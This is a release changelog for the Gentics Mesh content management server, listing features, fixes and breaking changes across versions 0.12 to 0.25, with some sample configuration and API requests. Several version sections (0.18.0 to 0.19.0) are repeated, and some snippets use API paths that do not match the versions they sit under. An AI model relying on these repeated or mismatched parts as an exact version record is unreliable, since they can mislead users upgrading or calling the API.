icon:plus[] Clustering: The Hazelcast Kubernetes autodiscovery plugin was added to Gentics Mesh. It is now possible to use this plugin to discover nodes in a k8s environment. Take a look at our link:{{< relref "clustering.asciidoc" >}}#_kubernetes[documentation] for more details.

icon:check[] Java REST Client: Added more detailed error information to the `MeshRestClientMessageException` class.

[[v0.25.0]]
== 0.25.0 (08.10.2018)

icon:plus[] Plugins: It is now possible to override the plugin config in a `config.local.yml` file.

icon:plus[] Core: The core Vert.x library was updated to version 3.5.4

icon:plus[] OrientDB: The included OrientDB version has been updated to version 2.2.37

icon:plus[] GraphQL: Added filters for users, groups and roles.

icon:check[] GraphQL: GraphQL Java has been updated to version 10.0

icon:check[] Core: Loading of older jobs could cause an error. The causes of those errors have been fixed.

icon:check[] Migration: Fixed a migration regression which was introduced with 0.24.1.

icon:check[] Demo: Fixed the demo webroot path handling. This fix only affects new demo setups.

[[v0.24.1]]
== 0.24.1 (02.10.2018)

icon:plus[] Config: It is now possible to configure the path to the mesh lock file using the `MESH_LOCK_PATH` environment variable. link:https://github.com/gentics/mesh/issues/506[#506]

icon:plus[] It is now possible to add custom languages by configuration.

icon:check[] UI: Added a scrollbar to the schema dropdown menu. link:https://github.com/gentics/mesh-ui/pull/163[#163]

icon:check[] Core: An inconsistency within the webroot path handling has been fixed. Previously the webroot path uniqueness checks would not work correctly once another branch had been added.

icon:check[] REST: The response error code handling for uploads has been updated. Previously no error 413 was returned when the upload limit was reached.

icon:check[] Elasticsearch: The initial sync check will be omitted if no Elasticsearch has been configured.

icon:check[] Java REST Client: Fixed a bug that could lead to duplicate request headers.

[[v0.24.0]]
== 0.24.0 (25.07.2018)

CAUTION: The default value of `25` for the `perPage` parameter has been removed. By default all elements will be returned and no paging will be applied. A request sketch follows after this section.

icon:check[] Core: A regression within the webroot performance enhancement fix of `0.23.0` has been fixed.
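Clients which relied on the old default can request the previous behaviour explicitly, as in this sketch (Python with `requests`; host and project are placeholders, and the `page` companion parameter is an assumption):

[source,python]
----
import requests

BASE = "http://localhost:8080"  # placeholder instance

# Explicitly page the node list now that no default page size is applied.
resp = requests.get(f"{BASE}/api/v2/demo/nodes",
                    params={"perPage": 25, "page": 1})
print(resp.status_code)
----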
[[v0.23.0]]
== 0.23.0 (24.07.2018)

CAUTION: The breadcrumb of the REST node response and the breadcrumb of the node type in GraphQL have changed. The first element is now the root node of the project, followed by its descendants, including the currently queried node. Previously the order was reversed, and the root node and the current node were missing. link:https://github.com/gentics/mesh/issues/398[#398]

CAUTION: The concept of releases has been renamed to branches. The database structure will automatically be updated.

* The following query parameters have been changed: `release` -> `branch`, `updateAssignedReleases` -> `updateAssignedBranches`, `updateReleaseNames` -> `updateBranchNames`
* The `releases` endpoint was renamed to `branches`.
* The `mesh.release.created`, `mesh.release.updated`, `mesh.release.deleted` events have been changed to `mesh.branch.created`, `mesh.branch.updated`, `mesh.branch.deleted`.
* The Java REST models have been renamed. (e.g.: ReleaseCreateRequest -> BranchCreateRequest)
* I18n messages have been changed accordingly.
* The GraphQL field `release` has been renamed to `branch`. The type name was also updated.

icon:plus[] Elasticsearch: The base64 encoded binary document data will no longer be stored in the search index.

icon:plus[] Elasticsearch: The `/search/status` endpoint now has a new field `available` which shows whether Elasticsearch is currently ready to process search queries.

icon:plus[] Elasticsearch: An error was fixed which was thrown when Elasticsearch was disabled and a re-sync was scheduled.

icon:plus[] REST: Added the `?etag=false` query parameter which can be used to omit the ETag value generation in order to increase performance when ETags are not needed.

icon:plus[] REST: Added the `?fields=uuid,username` query parameter which can be used to filter the response to only include the listed fields. The filters work for most responses and can be used to increase write performance for REST.

icon:plus[] GraphQL: It is now possible to filter schemas by their container flag.

icon:check[] GraphQL: Fixed a bug that caused an error when multiple queries were executed concurrently.

icon:check[] Core: Increased performance of the webroot endpoint.

icon:plus[] REST: Re-enabled the SSL options. It is now possible to configure SSL via the `MESH_HTTP_SSL_KEY_PATH`, `MESH_HTTP_SSL_CERT_PATH` and `MESH_HTTP_SSL_ENABLE` environment variables.

[[v0.22.11]]
== 0.22.11 (05.03.2019)

icon:plus[] GraphQL: The underlying graphql-java library was updated to version 10.0.

icon:plus[] GraphQL: Nodes can now be loaded via a list of UUIDs.

[[v0.22.10]]
== 0.22.10 (18.01.2019)

icon:check[] Elasticsearch: Fixed a bug that caused a schema migration to never finish. This affected nodes with binaries that are readable by the Elasticsearch Ingest Attachment Processor Plugin.

icon:check[] Image: Resizing images will now use the balanced quality setting. This helps with images that suffered from visible aliasing.

[[v0.22.9]]
== 0.22.9 (15.01.2019)

icon:plus[] Consistency Checks: Additional consistency checks and repair actions have been added.

icon:plus[] Memory: The memory footprint of various operations has been reduced.

icon:plus[] Consistency Checks: The consistency endpoint response will now also list a `repairCount` property which contains the count of repair operations. The response will now only contain the first 200 results. The `outputTruncated` property indicates whether the result has been truncated.

icon:check[] Core: Node deletion will now also remove connected lists and micronodes.
Previously these elements were not properly removed. On large systems this could lead to increased disk usage.

[[v0.22.8]]
== 0.22.8 (30.11.2018)

icon:plus[] OrientDB: The included OrientDB version has been updated to version 2.2.37

[[v0.22.7]]
== 0.22.7 (12.11.2018)

icon:check[] Elasticsearch: The check for the `ingest-attachment` plugin was fixed for installations which were using the `AWS` Elasticsearch service.

icon:plus[] API: OAuth2 server options can now be overridden via environment variables.

[[v0.22.6]]
== 0.22.6 (30.10.2018)

icon:check[] Java REST Client: Fixed wrong log output information.

icon:check[] REST: Fixed an error while fetching jobs for deleted projects.

icon:plus[] Elasticsearch: The index sync will now automatically remove indices which are no longer used.

[[v0.22.5]]
== 0.22.5 (12.10.2018)

icon:plus[] A default paging value can now be configured via the `defaultPageSize` field in the `mesh.yml` file, or the `MESH_DEFAULT_PAGE_SIZE` environment variable.

icon:check[] Java REST Client: Added more detailed error information to the `MeshRestClientMessageException` class.

[[v0.22.4]]
== 0.22.4 (08.10.2018)

icon:check[] REST: The response error code handling for uploads has been updated. Previously no error 413 was returned when the upload limit was reached.

icon:check[] Elasticsearch: The initial sync check will be omitted if no Elasticsearch has been configured.

icon:plus[] Plugins: It is now possible to override the plugin config in a `config.local.yml` file.

[[v0.22.3]]
== 0.22.3 (20.09.2018)

icon:plus[] It is now possible to add custom languages by configuration.

[[v0.22.2]]
== 0.22.2 (13.09.2018)

icon:check[] Java REST Client: Fixed a bug that could lead to duplicate request headers.

[[v0.22.1]]
== 0.22.1 (14.08.2018)

icon:plus[] Migration: The micronode and release migration performance has been greatly enhanced.

[[v0.22.0]]
== 0.22.0 (19.07.2018)

icon:bullhorn[] Metadata extraction

[quote]
____
This version of Gentics Mesh introduces the __Metadata extraction__ of file uploads (PDF, images).
GPS information of images will now be added to the search index. That information can be used to run link:{{< relref "elasticsearch.asciidoc" >}}#_search_nodes_by_geolocation_of_images[geo search queries].
A detailed description of this feature can be found in our link:{{< relref "features.asciidoc" >}}#_metadata_handling[File Uploads Documentation].

Existing binary fields will not automatically be processed to provide the metadata. You need to manually re-upload the data in order to generate the metadata properties.
____

icon:check[] Image: Focal point information within binary fields will now be utilized when invoking a download request which contains `?crop=fp&height=200&width=100`. Previously the stored information was not used and no focal point cropping was executed. link:https://github.com/gentics/mesh/issues/417[#417]
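A download request sketch using the focal point crop parameters quoted above (Python with `requests`; host, project, node UUID and field name are placeholders):

[source,python]
----
import requests

BASE = "http://localhost:8080"  # placeholder instance
node_uuid = "deadbeef0000000000000000000000dd"  # placeholder node UUID

# Crop around the stored focal point while resizing to 100x200.
resp = requests.get(f"{BASE}/api/v2/demo/nodes/{node_uuid}/binary/image",
                    params={"crop": "fp", "width": 100, "height": 200})

with open("cropped.jpg", "wb") as f:
    f.write(resp.content)
----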
icon:check[] Schema: A minor issue within the schema diff mechanism has been fixed. Previously the `elasticsearch` property was not correctly handled if an empty object had been provided during an update.

[[v0.21.5]]
== 0.21.5 (14.07.2018)

icon:check[] REST: The order of elements within a micronode list field will now be correctly preserved. Previously the order would change once the list reached a size of about 20 elements. link:https://github.com/gentics/mesh/issues/469[#469]

icon:check[] Memory: The memory footprint for deletion, publish and unpublish operations has been greatly reduced.

icon:check[] Config: Fixed the handling of the `MESH_VERTX_WORKER_POOL_SIZE` and `MESH_VERTX_EVENT_POOL_SIZE` environment variables. These variables were previously ignored.

icon:check[] REST: The node update response will now contain the updated node in the correct language. Any provided language parameter will be ignored.

icon:plus[] REST: The amount of fields which will be returned can now be tuned using the `?fields` query parameter. The parameter can be used to improve the write performance by only including the `uuid` parameter in the response.

icon:plus[] Core: The core Vert.x library was updated to version 3.5.3

[[v0.21.4]]
== 0.21.4 (09.07.2018)

icon:plus[] Migration: Segment path conflicts will now automatically be resolved during the node migration. Information about the actions taken can be found within the response of the migration job.

icon:plus[] Migration: The node migration performance has been greatly enhanced. link:https://github.com/gentics/mesh/issues/453[#453]

icon:check[] Elasticsearch: Start-up of Gentics Mesh will now fail early if the embedded Elasticsearch server can't be started. link:https://github.com/gentics/mesh/issues/445[#445]

icon:check[] Elasticsearch: The error logging has been enhanced. More detailed information will be logged if an index can't be created.

icon:check[] UI: Fixed potential encoding issues in the UI on systems which are not using the UTF-8 default character set.

icon:check[] Core: Fixed a bug that caused an unwanted schema migration when a schema update without any changes was invoked. This was the case with the `elasticsearch` properties.

[[v0.21.3]]
== 0.21.3 (19.06.2018)

icon:check[] GraphQL: Fixed a bug that caused an error when multiple queries were executed concurrently.

icon:check[] GraphQL: The language fallback handling for node reference fields has been enhanced. The language of the node will now be utilized when no language fallback has been specified.

icon:check[] GraphQL: The language fallback handling has been enhanced. The language fallback will now automatically be passed along to load nested fields.

icon:check[] GraphQL: The link resolving of HTML and string fields has been updated. Previously the language of the node which contained the field was not taken into account while resolving mesh links in these fields.

[[v0.21.2]]
== 0.21.2 (13.06.2018)

icon:check[] Elasticsearch: A compatibility issue with Elasticsearch instances which were hosted on Amazon AWS has been fixed. Previously the check for installed ES plugins failed.

[[v0.21.1]]
== 0.21.1 (28.05.2018)

icon:plus[] Elasticsearch: It is now possible to configure https://www.elastic.co/guide/en/elasticsearch/reference/current/mapping.html[custom mappings] for binary fields. Currently only the `mimeType` and `file.content` fields can be mapped.
An example for this mapping can be found in the link:{{< relref "elasticsearch.asciidoc" >}}#_binary_fields[Gentics Mesh search documentation].

[[v0.21.0]]
== 0.21.0 (27.05.2018)

icon:bullhorn[] Binary Search

[quote]
____
This version of Gentics Mesh introduces __Binary Search support__.

The https://www.elastic.co/guide/en/elasticsearch/plugins/6.2/ingest-attachment.html[Elasticsearch Ingest Attachment Plugin] will be utilized if possible to process text file uploads (PDF, DOC, DOCX).
A detailed description of this feature can be found in our link:{{< relref "elasticsearch.asciidoc" >}}#_binarysearch[Elasticsearch Documentation].
____

icon:plus[] Elasticsearch: It is now possible to configure a prefix string within the search options. Multiple Gentics Mesh installations with different prefixes can now utilize the same Elasticsearch server. Created indices and pipelines will automatically be prefixed. Other elements which do not start with the prefix will be ignored.

[[v0.20.0]]
== 0.20.0 (25.05.2018)

icon:bullhorn[] OAuth2 Support

[quote]
____
This version of Gentics Mesh introduces __OAuth2 authentication support__. A detailed description of this feature can be found in our link:{{< relref "authentication.asciidoc" >}}#_oauth2[Authentication Documentation].
____

icon:plus[] Plugins: All plugin endpoints will now automatically be secured via the configured authentication mechanism.

icon:check[] Plugins: The admin client token will no longer expire. The token was previously only valid for one hour.

icon:check[] Plugins: When the deployment of a plugin fails during plugin initialization, the plugin can now be redeployed without restarting Gentics Mesh.

icon:check[] Plugins: A bug which prevented the user client from using the correct token has been fixed. The user client will now utilize the correct user token.

[[v0.19.2]]
== 0.19.2 (02.05.2018)

icon:check[] Docker: The base image of the Gentics Mesh docker container has been reverted back to `java:openjdk-8-jre-alpine`. We will switch to Java 10 with the upcoming OrientDB 3.0.0 update.

icon:check[] UI: In some cases the UI did not load quickly. We updated the caching mechanism so that the UI loads quickly after a new Gentics Mesh version has been deployed.

[[v0.19.1]]
== 0.19.1 (30.04.2018)

icon:plus[] REST: The `{apiLatest}/admin/consistency/repair` endpoint has been added. The endpoint can be used to verify and directly repair found inconsistencies. The `{apiLatest}/admin/consistency/check` endpoint response has been updated to also include information about the action which will be performed by `/repair` in order to repair the inconsistency. You can read more about these endpoints in the link:{{< relref "administration-guide.asciidoc" >}}#_database_consistency[database consistency] section of our administration documentation.
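A sketch of the check/repair round trip (Python with `requests`; host and credentials are placeholders, and the HTTP methods are assumptions — the changelog names the endpoints but not their verbs):

[source,python]
----
import requests

BASE = "http://localhost:8080"  # placeholder instance

session = requests.Session()
session.post(f"{BASE}/api/v2/auth/login",
             json={"username": "admin", "password": "admin"})

# Inspect the reported inconsistencies and the planned repair actions ...
report = session.get(f"{BASE}/api/v2/admin/consistency/check").json()

# ... then verify and repair them directly.
result = session.post(f"{BASE}/api/v2/admin/consistency/repair").json()
----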
[[v0.19.0]]
== 0.19.0 (28.04.2018)

icon:bullhorn[] Plugin System

[quote]
____
This version of Gentics Mesh introduces the _Plugin System_. A detailed description of this feature can be found in our link:{{< relref "plugin-system.asciidoc" >}}[Plugin System Documentation].
____

icon:plus[] The base image of the Gentics Mesh docker container has been changed to `openjdk:10-slim`.

icon:plus[] Logging: The logging verbosity has been further decreased.

[[v0.18.3]]
== 0.18.3 (25.04.2018)

icon:check[] REST: Added an error response when updating a user node reference without specifying the project name.

icon:check[] REST: Fixed the root cause of an inconsistency which caused the deletion of referenced nodes when deleting a node.

[[v0.18.2]]
== 0.18.2 (23.04.2018)

CAUTION: The database revision was updated due to the OrientDB update. Thus only an link:{{< relref "clustering.asciidoc" >}}#_offline_upgrade[offline upgrade] can be performed when using clustered mode.

CAUTION: The generation of the search index document version has been reworked in order to increase index sync performance. A triggered index sync will thus re-sync all documents. Triggering the sync action is not required and can be executed at any time.

icon:plus[] Backup/Restore: It is no longer required to restart the server after a backup has been restored via the `{apiLatest}/admin/graphdb/restore` endpoint. link:https://github.com/gentics/mesh/issues/387[#387]

icon:plus[] OrientDB: The included OrientDB version has been updated to version 2.2.34

icon:plus[] Consistency: Additional consistency checks have been added.

icon:check[] Consistency: Various consistency issues have been fixed.

icon:check[] REST: Fixed various security related issues.

icon:check[] Core: Image data in binary fields will now only be processed/transformed if the binary is in a readable file format. The readable image file formats are `png`, `jpg`, `bmp` and `gif`.

icon:check[] Core: Added consistency checks for node versions.

icon:check[] Core: Deleting language versions of nodes will no longer create inconsistencies.

icon:check[] Core: Projects containing multiple releases can now be deleted without any error.

[[v0.18.1]]
== 0.18.1 (13.04.2018)

icon:check[] Core: Added a consistency check for node containers.

icon:check[] GraphQL: Using filtering with nodes without content no longer throws an error.

icon:check[] REST: Added the missing `hostname` and `ssl` property handling for release creation requests.

icon:check[] REST: Creating a release with a fixed UUID will now invoke the node migration.

icon:check[] Java REST Client: The `eventbus()` method now correctly sends authorization headers.

icon:check[] Java REST Client: Missing methods to start schema/microschema migrations for a release have been added.

[[v0.18.0]]
== 0.18.0 (06.04.2018)

icon:bullhorn[] GraphQL filtering

[quote]
____
This version of Gentics Mesh introduces _GraphQL filtering_. A detailed description of this feature can be found in our link:{{< relref "graphql.asciidoc" >}}#_filtering[Documentation].
____

CAUTION: Search: The `{apiLatest}/search/reindex` endpoint was replaced by `{apiLatest}/search/sync`.

icon:plus[] Docs: The link:{{< relref "contributing.asciidoc" >}}[Contribution Guide] has been added.

icon:plus[] The `{apiLatest}/search/sync` endpoint can now be used to trigger a differential synchronization of the search indices. The indices will no longer be dropped and re-populated. Instead only the needed actions will be executed to sync the index with the Gentics Mesh data.
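A sketch of triggering the differential sync and watching its progress (Python with `requests`; host is a placeholder, and `POST` for the sync trigger is an assumption — the status endpoint is documented as `GET` below):

[source,python]
----
import time
import requests

BASE = "http://localhost:8080"  # placeholder instance

session = requests.Session()
session.post(f"{BASE}/api/v2/auth/login",
             json={"username": "admin", "password": "admin"})

# Trigger the differential index synchronization ...
session.post(f"{BASE}/api/v2/search/sync")

# ... and poll the status endpoint for the sync progress.
for _ in range(10):
    print(session.get(f"{BASE}/api/v2/search/status").json())
    time.sleep(1)
----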
[[v0.19.0]]
== 0.19.0 (28.04.2018)

icon:bullhorn[] Plugin System

[quote]
____
This version of Gentics Mesh introduces the _Plugin System_.
A detailed description of this feature can be found in our link:{{< relref "plugin-system.asciidoc" >}}[Plugin System Documentation].
____

icon:plus[] The base image of the Gentics Mesh docker container has been changed to `openjdk:10-slim`.

icon:plus[] Logging: The logging verbosity has been further decreased.

[[v0.18.3]]
== 0.18.3 (25.04.2018)

icon:check[] REST: Add an error response when updating a user node reference without specifying the project name.

icon:check[] REST: Fixed the root cause of an inconsistency which caused the deletion of referenced nodes when deleting a node.

[[v0.18.2]]
== 0.18.2 (23.04.2018)

CAUTION: The database revision was updated due to the OrientDB update. Thus only an link:{{< relref "clustering.asciidoc" >}}#_offline_upgrade[offline upgrade] can be performed when using clustered mode.

CAUTION: The generation of the search index document version has been reworked in order to increase index sync performance.
 A triggered index sync will thus re-sync all documents. Triggering the sync action is not required and can be executed at any time.

icon:plus[] Backup/Restore: It is no longer required to restart the server after a backup has been restored via the `{apiLatest}/admin/graphdb/restore` endpoint. link:https://github.com/gentics/mesh/issues/387[#387]

icon:plus[] OrientDB: The included OrientDB version has been updated to version 2.2.34.

icon:plus[] Consistency: Additional consistency checks have been added.

icon:check[] Consistency: Various consistency issues have been fixed.

icon:check[] REST: Fixed various security related issues.

icon:check[] Core: Image data in binary fields will now only be processed/transformed if the binary is in a readable file format. The readable image file formats are `png`, `jpg`, `bmp` and `gif`.

icon:check[] Core: Added consistency checks for node versions.

icon:check[] Core: Deleting language versions of nodes will no longer create inconsistencies.

icon:check[] Core: Projects containing multiple releases can now be deleted without any error.

[[v0.18.1]]
== 0.18.1 (13.04.2018)

icon:check[] Core: Added a consistency check for node containers.

icon:check[] GraphQL: Using filtering with nodes without content no longer throws an error.

icon:check[] REST: Added missing `hostname` and `ssl` property handling for release creation requests.

icon:check[] REST: Creating a release with a fixed UUID will now invoke the node migration.

icon:check[] Java REST Client: The `eventbus()` method now correctly sends authorization headers.

icon:check[] Java REST Client: Missing methods to start schema/microschema migrations for a release have been added.

[[v0.18.0]]
== 0.18.0 (06.04.2018)

icon:bullhorn[] GraphQL filtering

[quote]
____
This version of Gentics Mesh introduces _GraphQL filtering_. A detailed description of this feature can be found in our link:{{< relref "graphql.asciidoc" >}}#_filtering[Documentation].
____

---

CAUTION: Search: The `{apiLatest}/search/reindex` endpoint was replaced by `{apiLatest}/search/sync`.

icon:plus[] Docs: The link:{{< relref "contributing.asciidoc" >}}[Contribution Guide] has been added.

icon:plus[] The `{apiLatest}/search/sync` endpoint can now be used to trigger the differential synchronization of search indices.
 The indices will no longer be dropped and re-populated. Instead only the needed actions will be executed to sync the index with the Gentics Mesh data.

icon:plus[] The `{apiLatest}/search/clear` endpoint has been added. It can be used to re-create all Elasticsearch indices which are managed by Gentics Mesh.
 Note that this operation does not invoke the index sync.

icon:plus[] Docker: A new volume location for the data directory of the embedded elasticsearch has been added.
 You can now use the `/elasticsearch/data` folder to mount your elasticsearch data files. link:https://github.com/gentics/mesh/issues/348[#348]

icon:plus[] REST: The `{apiLatest}/search/status` endpoint has been enhanced. The endpoint will now also return the current elasticsearch sync progress.

icon:plus[] Logging: The logging verbosity has been further decreased.

icon:check[] REST: Fixed the ETag generation for nodes.
 Previously taking a node offline did not alter the ETag, which also led to inconsistent status
 information being displayed in the Mesh UI. link:https://github.com/gentics/mesh/issues/345[#345]

icon:check[] Java REST Client: Fixed webroot requests never returning when the path contained whitespace.

icon:check[] GraphQL: Fixed a bug which caused the language parameter of the nodes query method to be ignored in some cases. link:https://github.com/gentics/mesh/issues/365[#365]

icon:check[] REST: The `{apiLatest}/microschemas` endpoint will now correctly detect name conflicts during microschema creation.

[[v0.17.3]]
== 0.17.3 (15.03.2018)

icon:check[] UI: Restrict nodes to certain schemas if `allow` is set in node list fields.

[[v0.17.2]]
== 0.17.2 (13.03.2018)

icon:plus[] Docker: A new volume location for the `config` directory has been added.
 You can now use the `/config` folder to mount your configuration files.

icon:plus[] Core: The Vert.x library has been downgraded to 3.5.0 due to a regression which could cause requests to not be handled by the HTTP server.

[[v0.17.1]]
== 0.17.1 (08.03.2018)

icon:plus[] OrientDB: The included OrientDB version has been updated to version 2.2.33.

icon:plus[] Core: The core Vert.x library was updated to version 3.5.1.

icon:plus[] Config: It is now possible to configure the elasticsearch start-up timeout via the `search.startupTimeout` field in the `mesh.yml` or via the `MESH_ELASTICSEARCH_STARTUP_TIMEOUT` environment variable.
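A sketch of both variants (the timeout unit and value are assumptions; please check the configuration reference):

[source,yaml]
----
# mesh.yml - wait up to the configured timeout for Elasticsearch on start-up
search:
  startupTimeout: 60
----

The same setting could be passed to a container via `-e MESH_ELASTICSEARCH_STARTUP_TIMEOUT=60`.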
icon:plus[] Search: The reindex endpoint will now execute the reindex operation asynchronously.

icon:plus[] Search: Two new reindex specific events have been added: `mesh.search.reindex.failed`, `mesh.search.reindex.completed`.

icon:plus[] REST: The `GET {apiLatest}/search/status` endpoint response has been updated. The `reindexRunning` flag has been added.

icon:check[] Config: Fixed a bug which prevented optional boolean environment variables (e.g. `MESH_HTTP_CORS_ENABLE_ENV`) from being handled correctly.

icon:check[] Core: It is now possible to change the listType of a list field in a schema via the REST API.

icon:check[] Core: The server will now shut down if an error has been detected during start-up.

icon:check[] REST: Fixed an error which led to inconsistent properties being shown in the job endpoint response.

icon:check[] Search: When calling reindex via the `POST {apiLatest}/search/reindex` endpoint the reindexing stopped after a certain amount of
 time because of a timeout in the database transaction. This has been fixed now.

icon:check[] REST: In some cases parallel file uploads of multiple images could cause the upload process to never finish. This has been fixed now.

[[v0.17.0]]
== 0.17.0 (22.02.2018)

CAUTION: Search: The raw search endpoints now wrap a multisearch request. The endpoint response will now include the elasticsearch responses array. The query stays the same.

icon:plus[] Demo: The link:https://demo.getmesh.io/demo[demo application] was updated to use Angular 5.

icon:plus[] Core: Gentics Mesh can now be downgraded if the link:{{< relref "administration-guide.asciidoc" >}}#database-revisions[database revision] matches the needed revision of Gentics Mesh.

icon:plus[] Clustering: Gentics Mesh is now able to form a cluster between different server versions.
 A database revision hash will now be used to determine which versions of Gentics Mesh can form a cluster.
 Only instances with the same database revision hash are allowed to form a cluster.
 The current revision hash info is included in the `{apiLatest}` endpoint response.

icon:plus[] Various settings can now be overridden via link:{{< relref "administration-guide.asciidoc" >}}#_environment_variables[environment variables]. This is useful when dealing with docker based deployments.
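For instance, a docker based deployment could override the Elasticsearch start-up timeout introduced in 0.17.1 without mounting a `mesh.yml` (a sketch; the value is illustrative):

[source,bash]
----
# Environment variables override the corresponding mesh.yml settings
docker run -e MESH_ELASTICSEARCH_STARTUP_TIMEOUT=60 gentics/mesh
----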
icon:check[] Elasticsearch: Search requests failed on systems with many schemas. link:https://github.com/gentics/mesh/issues/303[#303]

icon:check[] Elasticsearch: Fixed the handling of `search.url` settings which contained an https URL.

icon:check[] Image: The image resizer returned the original image if no `fpx`,`fpy` were present for a focal point image resize request. link:https://github.com/gentics/mesh/issues/272[#272]

icon:check[] Image: The focal point resize returned a slightly skewed image when using the `fpz` zoom factor. link:https://github.com/gentics/mesh/issues/272[#272]

icon:check[] Events: The `mesh.node.deleted` event was not handled correctly. This has been fixed now.

icon:check[] Core: It was possible to upload binaries with empty filenames. This has been fixed now: it is enforced that
 a binary upload has a filename and content type which are not empty. link:https://github.com/gentics/mesh/issues/299[#299]

icon:check[] Core: If the keystore path was only a file name without a directory an NPE was thrown on start-up. This has been fixed now.

icon:check[] Core: After resetting a job via REST (admin/jobs/::uuid::/error) the job was not processed again.
 This has been fixed now. link:https://github.com/gentics/mesh/issues/295[#295]

icon:check[] Core: When the migration for multiple nodes failed during a schema migration the error details could become very long.
 This has been fixed now. Error details in the job list will be truncated after a certain amount of characters.

icon:check[] Core: Image transformation calls previously did not copy the properties of the binary field: the filename and other properties were missing from the new binary image field. This has been fixed now.

icon:plus[] REST: It is now possible to use custom `HttpClientOptions` upon instantiation of a `MeshRestHttpClient`.

icon:check[] REST: The node response ETag now incorporates the uuids of all node references.

icon:check[] REST: The `{apiLatest}/auth/logout` endpoint will now correctly delete the `mesh.token` cookie. link:https://github.com/gentics/mesh/issues/282[#282]

[[v0.16.0]]
== 0.16.0 (07.02.2018)

CAUTION: Search: The contents of HTML and HTML list fields will now automatically be stripped of markup prior to indexing.

CAUTION: The `mesh.yml` search section has been updated. The `search.url` property replaces the `search.hosts` property.

[source,yaml]
----
search:
  url: "http://localhost:9200"
  timeout: 8000
  startEmbedded: false
----

icon:plus[] GraphQL: The underlying graphql-java library was updated to version 7.0.

icon:check[] REST: An error which prevented the `{apiLatest}` info endpoint from returning version information has been fixed.

icon:plus[] OrientDB: The included OrientDB Studio has been updated to version 2.2.32.

icon:plus[] Config: It is now possible to configure the JVM arguments of the embedded Elasticsearch server via the `search.embeddedArguments` property in the `mesh.yml` file.

icon:plus[] GraphQL: Schema fields can now be queried. Currently supported are `name`, `label`, `required` and `type`.

[[v0.15.0]]
== 0.15.0 (31.01.2018)

CAUTION: The embedded Elasticsearch was removed and replaced by a connector to a dedicated Elasticsearch server. It is highly recommended to verify existing queries due to breaking changes between Elasticsearch version 2.4 and 6.1.
Please also check the Elasticsearch changelog: link:https://www.elastic.co/guide/en/elasticsearch/reference/current/release-notes-6.1.0.html[Elasticsearch Changelog]

CAUTION: Configuration: The `mesh.yml` format has been updated. Please remove the `search` section or replace it with the following settings.

[source,yaml]
----
search:
  hosts:
    - hostname: "localhost"
      port: 9200
      protocol: "http"
  startEmbeddedES: true
----

CAUTION: The Elasticsearch update may affect custom mappings within your schemas. You may need to manually update your schemas.

Elasticsearch 6.1 compliant example for the commonly used raw field:

[source,json]
----
{
  "fields": {
    "raw": {
      "type": "keyword",
      "index": true
    }
  }
}
----

CAUTION: The `unfilteredCount` GraphQL paging property has been removed. You can now use the `totalCount` property instead.

CAUTION: Gentics Mesh will automatically extract and start an embedded Elasticsearch server into the `elasticsearch` folder. The old search index (e.g. `data/searchIndex`) can be removed.

CAUTION: The user which is used to run the process within the docker image has been changed. You may need to update your data volume ownership to uid/gid 1000.

icon:plus[] REST: The UUID of the referenced binary data will now also be listed for binary fields.
 Fields which share the same binary data will also share the same binary UUID.

icon:plus[] GraphQL: It is now possible to read the focal point information and binary uuid of binary fields.

icon:plus[] Docs: The link:{{< relref "elasticsearch.asciidoc" >}}[Elasticsearch integration documentation] has been enhanced.

icon:plus[] Search: The overall search performance has been increased.

icon:plus[] Logging: The logging verbosity has been further decreased.
[[v0.14.2]]
== 0.14.2 (30.01.2018)

icon:check[] Elasticsearch: Fixed a bug which caused an internal error when granting multiple permissions to the same element at the same time.

icon:check[] GraphQL: The `linkType` parameter for string and html fields now causes the link to be rendered in the language of the queried node if no language information is given.

[[v0.14.1]]
== 0.14.1 (19.01.2018)

icon:check[] Core: Fixed a deadlock situation which could occur when handling more than 20 image resize requests in parallel. Image resize operations will now utilize a dedicated thread pool.

icon:check[] Core: Fixed a bug which caused permission inconsistencies when deleting a group from the system.

icon:plus[] REST: Added support to automatically handle the `Expect: 100-Continue` header. We recommend to only use this header for upload requests.
Using this header for other requests will unnecessarily increase their response times. Note that PHP curl will add this header by default.
You can read more about the link:https://support.urbanairship.com/hc/en-us/articles/213492003--Expect-100-Continue-Issues-and-Risks[header here].

[[v0.14.0]]
== 0.14.0 (16.01.2018)

CAUTION: The image manipulation query parameters `cropx`, `cropy`, `croph` and `cropw` have been replaced by the `rect` parameter. The `rect` parameter contains the needed values `rect=x,y,w,h`.

CAUTION: The image manipulation query parameter `width` was renamed to `w`. The parameter `height` was renamed to `h`.

CAUTION: The binary transformation request was updated. The crop parameters are now nested within the `cropRect` object.

CAUTION: It is now required to specify the crop mode when cropping an image. Possible crop modes are `rect`, which will utilize the specified crop area, and `fp`, which will utilize the focal point information in order to crop the image.

icon:plus[] Image: It is now possible to specify a focal point within the binary field of an image.
 This focal point can be used to automatically crop the image in a way that the focused area is kept in the image.
 The focal point can also be manually specified when requesting an image.
 This will overrule any previously stored focal point information within the binary field.

icon:plus[] UI: The admin UI has been updated to use the renamed image parameters.
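A sketch of the new parameter style (the project name `demo`, the binary field name `image` and the `crop` parameter name are illustrative assumptions):

[source,bash]
----
# Crop to the rectangle x=10, y=20, w=800, h=600, then scale to 400 pixels width
curl "localhost:8080/api/v1/demo/nodes/:nodeUuid/binary/image?crop=rect&rect=10,20,800,600&w=400"

# Crop around the stored focal point instead
curl "localhost:8080/api/v1/demo/nodes/:nodeUuid/binary/image?crop=fp&w=400&h=300"
----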
[[v0.13.3]]
== 0.13.3 (12.01.2018)

icon:check[] Core: Optimized concurrency when handling binary data streams (e.g. downloading, image resizing).

icon:check[] Core: Fixed some bugs which left file handles open and thus clogged the system. This could lead to a lock-up of the system in some cases.

[[v0.13.2]]
== 0.13.2 (11.01.2018)

icon:plus[] Java REST Client: It is now possible to retrieve the client version via `MeshRestClient.getPlainVersion()`.

icon:check[] Core: The consistency checks have been enhanced.

icon:check[] Core: Fixed some bugs which left file handles open and thus clogged the system. This could lead to a lock-up of the system in some cases.

[[v0.13.1]]
== 0.13.1 (05.01.2018)

icon:check[] Core: A Vert.x bug has been patched which caused HTTP requests with the "Connection: close" header set to fail.

icon:check[] REST: A concurrency issue has been addressed which only occurred when deleting and creating projects in fast succession.

icon:check[] Core: A potential concurrency issue has been fixed when handling request parameters.

[[v0.13.0]]
== 0.13.0 (02.01.2018)

CAUTION: The Java REST client was updated to use RxJava 2.

icon:plus[] Core: The internal RxJava code has been migrated to version 2.

[[v0.12.0]]
== 0.12.0 (21.12.2017)

